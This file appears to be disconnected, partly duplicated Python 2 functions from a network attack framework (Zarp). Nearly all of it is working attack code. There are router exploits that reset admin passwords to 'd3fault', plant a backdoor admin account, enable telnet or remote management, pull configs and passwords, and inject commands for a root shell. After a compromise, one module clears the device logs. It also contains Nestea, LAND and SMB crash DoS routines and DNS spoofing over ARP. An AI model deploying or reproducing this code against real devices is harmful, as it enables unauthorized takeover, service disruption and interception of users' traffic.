def update():
"""Run update routine
"""
if not util.does_file_exist('./.git/config'):
util.Error(
'Not a git repo; please checkout from Github with \n\tgit clone http://github.com/hatRiot/zarp.git\n to update.'
)
else:
util.Msg('Updating Zarp...')
ret = util.init_app('git branch -a | grep \'* dev\'', True)
if len(ret) > 3:
util.Error(
'You appear to be on the dev branch. Please switch off dev to update.'
)
return
ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD',
True)
if 'Already up-to-date' in ret:
util.Msg('Zarp already up to date.')
elif 'fatal' in ret:
util.Error('Error updating Zarp: %s' % ret)
else:
from util import version
util.Msg('Zarp updated to version %s' % (version()))
def initialize(self):
version = util.get_input('Enter Zoom version [2/3]: ')
util.Msg('Changing admin password to \'d3fault\'...')
url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\
'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\
'cmdSubmit=Save+Changes' % self.config['target'].value
url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\
'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\
'id=3&cmdSubmit=Save+Changes' % self.config['target'].value
url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config[
'target'].value
try:
if version == '2':
urllib.urlopen(url_25).read()
else:
urllib.urlopen(url_30).read()
util.Msg("Password reset, clearing logs...")
urllib.urlopen(url_logs).read()
util.Msg('Done. Connect to %s with admin:d3fault' %
self.config['target'].value)
except Exception, e:
util.Error('Unable to connect: %s' % e)
def initialize(self):
target = self.config['target'].value
try:
pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10)
pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116)
pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224)
while True:
util.Msg('DoSing %s...' % target)
send(pkt1)
send(pkt2)
send(pkt3)
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? [Y/n] ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except KeyboardInterrupt:
return
except Exception:
util.Error('Error with given address. Could not complete DoS.')
return
def initialize(self):
# supress scapy output
conf.verb = 0
try:
self.target = raw_input('[!] Enter IP to DoS: ')
tmp = raw_input('[!] LAND attack at ip %s. Is this correct? ' %
self.target)
if 'n' in tmp.lower():
return
while True:
print '[!] DoSing %s...' % self.target
send(
IP(src=self.target, dst=self.target) /
TCP(sport=134, dport=134))
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except Exception, j:
util.Error('Error: %s' % j)
return
def initialize(self):
""" Initialize the DoS
"""
try:
pkt = ("\x00\x00\x00\x90"
"\xff\x53\x4d\x42"
"\x72\x00\x00\x00"
"\x00\x18\x53\xc8"
"\x00\x26"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.get_ip()
sock.connect((self.target, 445))
sock.send(pkt)
sock.close()
if self.is_alive():
util.Msg('Host appears to be up')
else:
util.Msg('Host is not responding - '
'it is either down or rejecting our probes.')
except Exception:
util.Error('Remote host not susceptible to vulnerability.')
return
def run(self):
util.Msg(
'Changing admin password and enabling remote telnet server...')
try:
data = urlencode({
'productid': 'RT-N56U',
'current_page': 'Advanced_System_Content.asp',
'next_page': '',
'next_host': '',
'sid_list': 'LANHostConfig%3BGeneral%3B',
'group_id': '',
'modified': '0',
'action_mode': '+Apply+',
'first_time': '',
'action_script': '',
'preferred_lang': 'EN',
'wl_ssid2': 'wat',
'firmver': '1.0.7f',
'http_passwd': 'd3fault',
'http_passwd2': 'd3fault',
'v_password2': 'd3fault',
'log_ipaddr': '',
'time_zone': 'UCT12',
'ntp_server0': 'pool.ntp.org',
'telnetd': '1'
})
response = urlopen("http://%s/start_apply.htm" % self.ip,
data).read()
if "You cannot Login unless logout another user first" in response:
util.Msg("Another user is logged in, attempt to logout? [y] ")
util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip)
except Exception, e:
util.Error('Error: %s' % e)
def initialize(self):
# shut scapy up
conf.verb = 0
try:
self.target = raw_input('[!] Enter IP address to DoS: ')
tmp = raw_input('[!] Nestea DoS IP %s. Is this correct? ' %
self.target)
if 'n' in tmp.lower():
return
while True:
util.Msg('DoSing %s...' % self.target)
send(
IP(dst=self.target, id=42, flags="MF") / UDP() /
("X" * 10))
send(IP(dst=self.target, id=42, frag=48) / ("X" * 116))
send(
IP(dst=self.target, id=42, flags="MF") / UDP() /
("X" * 224))
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except Exception, j:
util.Error('Error with given address. Could not complete DoS.')
return
def parse(sysv, loader):
""" Modules can set their own CLI options. Right now we only
load services and scanners, as these represent a majority of
the 'typical' use case for something you want to pull off quickly.
loader is a Loader object with all loaded modules.
"""
parser = argparse.ArgumentParser(description=util.header())
# add standard options
parser.add_argument('-q', help='Generic network sniff', action='store',
dest='filter')
parser.add_argument('--update', help='Update Zarp', action='store_true',
default=False, dest='update')
service_group = parser.add_argument_group('Services')
scanner_group = parser.add_argument_group('Scanners')
# iterate through loaded modules and build the argument parser
for service in loader.services:
if hasattr(service, 'cli'):
service().cli(service_group)
for scanner in loader.scanner:
if hasattr(scanner, 'cli'):
scanner().cli(scanner_group)
options = parser.parse_args()
option_dict = options.__dict__
# first handle standard options
if options.filter:
util.Msg("Sniffing with filter [%s]...(ctrl^c to exit)" %
options.filter)
try:
sniff(filter=options.filter, store=0, prn=lambda x: x.summary())
except Exception:
util.Msg("Exiting sniffer..")
except Scapy_Exception as msg:
util.Error(msg)
sys.exit(1)
elif options.update:
update()
sys.exit(1)
# we can only launch one module at a time, so grab the first
usr_mod = [x for x in option_dict.keys() if option_dict[x] is True][0]
# see what it is
if usr_mod in [x().which for x in loader.services]:
module = [x for x in loader.services if x().which == usr_mod][0]
util.Msg('Starting %s...' % module().which)
mod = module()
mod.dump_data = True
mod.initialize()
elif usr_mod in [x().which for x in loader.scanner]:
module = [x for x in loader.scanner if x().which == usr_mod][0]
module().initialize()
sys.exit(1)
def initialize(self):
"""Initialize the DNS spoofer. This is dependent
on a running ARP spoof; for now!
"""
try:
arps = None
key = None
if 'ARP Spoof' in stream.HOUSE:
house = stream.HOUSE['ARP Spoof']
else:
util.Error('ARP spoof required!')
return
while True:
stream.dump_module_sessions('ARP Spoof')
try:
num = int(raw_input('[number] > '))
except TypeError:
continue
if len(house.keys()) > num:
key = house.keys()[num]
arps = house[key]
self.source = arps.victim[0]
self.local_mac = arps.local[1]
break
else:
return
dns_name = raw_input('[!] Enter regex to match DNS:\t')
if dns_name in self.dns_spoofed_pair:
util.Msg('DNS is already being spoofed (%s).' %
(self.dns_spoofed_pair[dns_name]))
return
dns_spoofed = raw_input('[!] Spoof DNS entry matching %s to:\t' %
(dns_name))
tmp = raw_input(
'[!] Spoof DNS record \'%s\' to \'%s\'. Is this correct?' %
(dns_name, dns_spoofed))
if 'n' in tmp.lower():
return
dns_name = re.compile(dns_name)
self.dns_spoofed_pair[dns_name] = dns_spoofed
self.running = True
util.Msg('Starting DNS spoofer...')
thread = Thread(target=self.dns_sniffer)
thread.start()
except KeyboardInterrupt:
return None
except re.error:
util.Error('Invalid regex given.')
return None
except Exception, j:
util.Error('Error: %s' % j)
return None
def shutdown(self):
util.Msg('Shutting %s service down..' % self.which)
if self.running:
self.running = False
if self.log_data:
self.log(False, None)
util.Msg("%s shutdown." % self.which)
util.debug('%s shutdown.' % self.which)
def initialize(self):
util.Msg('Fetching config from %s...' % self.config['target'].value)
url = 'http://%s/config.bin' % self.config['target'].value
try:
response = urllib.urlopen(url).read()
util.Msg(response)
except Exception, e:
util.Error('Error: %s' % e)
def run(self):
util.Msg('Fetching config from %s...' % self.ip)
url = 'http://%s/config.bin' % self.ip
try:
response = urllib.urlopen(url).read()
util.Msg(response)
except Exception, e:
util.Error('Error: %s' % e)
def run(self):
util.Msg('Changing admin password to \'d3fault\'...')
try:
url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' % self.ip
response = urllib.urlopen(url).read()
util.Msg('Done. Admin password changed to \'d3fault\'')
except Exception, e:
util.Error('Error: %s' % e)
return
def shutdown(self):
""" Shut down the module cleanly
"""
util.Msg('Shutting \'%s\' down..' % self.which)
if self.running: self.running = False
if self.log_data: self.log(False)
util.Msg("%s shutdown." % self.which)
util.debug('%s shutdown.' % self.which)
def run(self):
url = 'http://%s/level/'%(self.ip)
for idx in range(16, 100):
url += str(idx) + '/exec/-'
response = urllib.urlopen(url).read()
if '200 ok' in response.lower():
util.Msg('Device vulnerable. Connect to %s for admin'%(self.ip))
return
util.Msg('Device not vulnerable.')
return
def initialize(self):
util.Msg('Changing admin password to \'d3fault\'...')
try:
url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \
% self.config['target'].value
urllib.urlopen(url).read()
util.Msg('Done. Admin password changed to \'d3fault\'')
except Exception, e:
util.Error('Error: %s' % e)
return
def initialize(self):
util.Msg("Starting redirect_port...")
self.modip()
self.running = True
util.Msg("Redirection to from TCP port {0} to {1}...".format(self.config['source_port'].value, self.config['dest_port'].value))
return True
def run(self):
util.Msg('Adding admin \'adm4n\' with password \'d3fault\'')
url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0'%self.ip
params = urllib.urlencode({'ACTION_POST':1, 'admin_name':'adm4n','admin_password':'******',
'admin_password2':'d3fault'})
try:
response = urllib.urlopen(url,params).read()
util.Msg('Done. Connect to %s with \'adm4n:d3fault\'' % self.ip)
except Exception, e:
util.Error('Failed: %s' % e)
return
def initialize(self):
url = 'http://%s/level/' % (self.config['target'].value)
for idx in range(16, 100):
url += str(idx) + '/exec/-'
response = urllib.urlopen(url).read()
if '200 ok' in response.lower():
util.Msg('Device vulnerable. Connect to %s for admin'
% (self.config['target'].value))
return
util.Msg('Device not vulnerable.')
return
def view(self):
"""Overridden Sniffer view
since we just need to dump info
out
"""
if len(self.netmap) <= 0:
util.Msg("No hosts yet mapped.")
else:
for address in self.netmap.keys():
print '\t%s\t%s\t%s'%(self.netmap[address].ip,self.netmap[address].mac,
self.netmap[address].host)
util.Msg('\t %s hosts found.'%len(self.netmap))
def run(self):
util.Msg('Resetting admin password to \'d3fault\'...')
try:
url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \
'&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \
'&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\
'&layout=en' % self.ip
urllib.urlopen(url).read()
util.Msg('Done')
except Exception, e:
util.Error('Error: %s' % e)
return
def run(self):
util.Msg('Changing admin password to \'d3fault\' '
'and enabling remote admin on port 8080...')
try:
url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \
'&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \
'&hip1=*&hport=8080&hEnable=1' % self.ip
urllib.urlopen(url).read()
util.Msg('Admin password changed to \'d3fault\' '
'and interface enabled on 8080')
except Exception, e:
util.Error('Error: %s' % e)
def initialize(self):
util.Msg('Fetching password from %s...' % self.config['target'].value)
url = 'http://%s/router-info.htm' % self.config['target'].value
url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value
try:
response = urllib.urlopen(url).read()
response2 = urllib.urlopen(url2).read()
util.Msg('First:')
print '\t' + response
util.Msg('Second:')
print '\t' + response2
except Exception, e:
util.Error('Error: %s' % e)
def run(self):
try:
util.Msg('Executing command injection on %s...' % self.ip)
sock = socket.socket()
sock.connect((self.ip, 8000))
sock.sendall(self.inject)
time.sleep(3)
util.Msg('Forcing the device to save...')
sock.sendall(self.hard_save)
sock.close()
util.Msg('Reboot router for root shell on %s:5555' % (self.ip))
except Exception, e:
util.Error('Error: %s' % e)
def run(self):
util.Msg('Fetching password from %s...' % self.ip)
url = 'http://%s/router-info.htm' % self.ip
url2 = 'http://%s/cgi-bin/router-info.htm' % self.ip
try:
response = urllib.urlopen(url).read()
response2 = urllib.urlopen(url2).read()
util.Msg('First:')
print '\t' + response
util.Msg('Second:')
print '\t' + response2
except Exception, e:
util.Error('Error: %s' % e)
def run(self):
util.Msg(
'Changing admin password and enabling remote telnet server...')
try:
url = 'http://%s/start_apply.htm?productid=RT-N56U¤t_page=Advanced_System_Content.asp' \
'&next_page=&next_host=&sid_list=LANHostConfig%3BGeneral%3B&group_id=&modified=0' \
'&action_mode=+Apply+&first_time=&action_script=&preferred_lang=EN&wl_ssid2=wat'\
'&firmver=1.0.7f&http_passwd=d3fault&http_passwd2=d3fault&v_password2=d3fault' \
'&log_ipaddr=&time_zone=UCT12&ntp_server0=pool.ntp.org&telnetd=1'%self.ip
response = urllib.urlopen(url).read()
util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip)
except Exception, e:
util.Error('Error: %s' % e)
def view(self):
""" Used to enter a state of 'focus'; i.e.
the user wants to see status updates, informational
messages, etc.
"""
try:
util.Msg('[enter] when finished')
util.Msg('Dumping output from \'%s\'...' % self.which)
self.dump_data = True
raw_input()
self.dump_data = False
except KeyboardInterrupt:
self.dump_data = False
return
def initialize(self):
try:
util.Msg('Executing command injection on %s...' %
self.config['target'].value)
sock = socket.socket()
sock.connect((self.config['target'].value, 8000))
sock.sendall(self.inject)
sleep(3)
util.Msg('Forcing the device to save...')
sock.sendall(self.hard_save)
sock.close()
util.Msg('Reboot router for root shell on %s:5555' %
(self.config['target'].value))
except Exception, e:
util.Error('Error: %s' % e)
def initialize(self):
try:
if not util.check_program('airmon-ng'):
util.Error(
'airomon-ng not installed. Please install to continue.')
return False
util.Msg('(ctrl^c) when finished.')
iface = util.get_monitor_adapter()
if iface is None:
util.Msg('No devices found in monitor mode. Enabling...')
iface = util.enable_monitor(self.channel)
util.debug('Using interface %s' % iface)
self.ap_scan(iface)
except Exception, KeyboardInterrupt:
return
def initialize(self):
"""initialize the NUD dos"""
util.Msg('Starting NUD DoS listener...')
self.running = True
dthread = Thread(target=self.listener)
dthread.start()
return 'NuD DoS Listener'
